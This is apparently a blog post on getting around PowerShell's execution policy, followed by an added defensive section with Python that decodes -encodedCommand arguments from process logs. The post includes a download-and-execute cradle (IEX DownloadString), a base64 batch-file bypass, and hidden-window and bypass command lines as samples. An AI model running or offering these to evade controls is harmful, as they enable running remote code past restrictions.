Getting Around Powershell Restrictions

The powershell execution policy can be limiting.  Find out what yours is by entering powershell and typing Get-ExecutionPolicy:


If the policy is set to Restricted, that means scripts are not allowed.  Only the interactive shell is allowed.  The obvious thing to do is try to use Set-ExecutionPolicy and change it, but you can’t always do that. Here are some ways around that:

1) Just paste the powershell script in and then run it.  This only works for smaller scripts.

2) Download and load the powershell script as described in the previous entry using the following command: IEX (New-Object Net.WebClient).DownloadString("https://script.com/colesec.ps1")

3) Use a .bat file to base64 encode everything first and then load it up.  It slows down the script some, but it works: the execution policy is checked when PowerShell loads a script file (.ps1), whereas -encodedCommand hands the script's text to PowerShell as a command string, which the policy does not govern.  This is the reason for this blog post.

Create a .bat file with the following contents:

powershell.exe -noprofile -Command "powershell.exe -noprofile -encodedCommand ([Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((gc %1 |%%{$_}|out-string))))"

Then just run the .bat file, followed by the ps1 file you want to run:

> PS.bat helloworld.ps1
Hello World
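Because the execution policy is not a security boundary, the useful defensive angle on the batch-file trick above is visibility: a process-creation event with command-line auditing (Windows 4688, or Sysmon Event ID 1) records the whole powershell.exe invocation, including the base64 blob, and PowerShell script block logging (Event 4104) records the script after decoding. The following Python is an added example, not code from the original post; it reverses exactly the encoding the batch file performs ([Convert]::ToBase64String over [Text.Encoding]::Unicode bytes, i.e. base64 over UTF-16LE) so an analyst can read what an encoded command actually ran. The sample command lines and the "Hello World" script are constructed for the example; the accepted flag spellings assume PowerShell's behaviour of accepting any unambiguous prefix of -EncodedCommand (such as -e, -ec, -enc).

```python
import base64
import re
from typing import List, Optional, Tuple

# Constructed sample: the same kind of one-line "Hello World" script the post
# runs, encoded the way -EncodedCommand expects (UTF-16LE bytes, then base64).
SAMPLE_SCRIPT = "Write-Output 'Hello World'\r\n"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed command lines of the shape a process-creation event would record.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -noprofile -Command Get-Date",
    f"powershell.exe -noprofile -encodedCommand {SAMPLE_ENCODED}",
    f"powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}",
    "powershell.exe -ep bypass -File maintenance.ps1",
    "cmd.exe /c dir",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (assumption noted
# in the lead-in), so match every prefix from -e up to the full name, plus -ec.
_FULL_FLAG = "encodedcommand"
_FLAG_SPELLINGS = [_FULL_FLAG[:i] for i in range(1, len(_FULL_FLAG) + 1)] + ["ec"]
_ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)[-/](?:"
    + "|".join(sorted(_FLAG_SPELLINGS, key=len, reverse=True))
    + r")\s+([A-Za-z0-9+/=]+)"
)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command.

    Returns None when no encoded-command flag is present, or when the argument
    is not valid base64 over UTF-16LE text (a -ep/-ExecutionPolicy flag, for
    example, is not mistaken for -e).
    """
    match = _ENC_FLAG.search(command_line)
    if match is None:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # binascii.Error (bad base64) is a ValueError; odd-length or invalid
        # UTF-16 raises UnicodeDecodeError.
        return None


def triage(command_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (command_line, decoded_script) pairs for each encoded launch."""
    hits = []
    for line in command_lines:
        decoded = decode_encoded_command(line)
        if decoded is not None:
            hits.append((line, decoded))
    return hits


if __name__ == "__main__":
    for original, decoded in triage(SAMPLE_COMMAND_LINES):
        print(f"{original[:60]}...\n    decodes to: {decoded.strip()}")
```

Run over real 4688 or Sysmon command-line fields, the decoder turns an opaque base64 argument into the script that actually executed; pairing that with script block logging (which sees the script after PowerShell decodes it, regardless of how it was delivered) is the practical answer to any of the execution-policy workarounds in this post.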


There are lots of other ways to go about doing this as well.  Here is a link with 15 ways to do it:

https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
